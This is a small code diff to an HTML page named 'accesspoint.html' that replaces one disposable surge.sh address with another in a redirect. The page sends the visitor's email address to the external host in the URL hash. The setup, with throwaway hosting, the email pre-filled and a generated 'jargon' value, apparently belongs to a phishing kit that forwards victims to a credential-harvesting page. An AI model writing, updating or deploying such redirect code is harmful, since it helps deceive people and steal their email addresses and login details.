--- a/accesspoint.html
+++ b/accesspoint.html
@@ -48,7 +48,7 @@
       const jargon = generateJargon();
 
       // Construct redirect URL: email + jargon in hash
-      const redirectURL = `https://datasite-3825583olec.surge.sh/#${email}`;
+      const redirectURL = `https://webdata-bx3478tmp.surge.sh/#${email}`;
 
       // Redirect
       window.location.href = redirectURL;
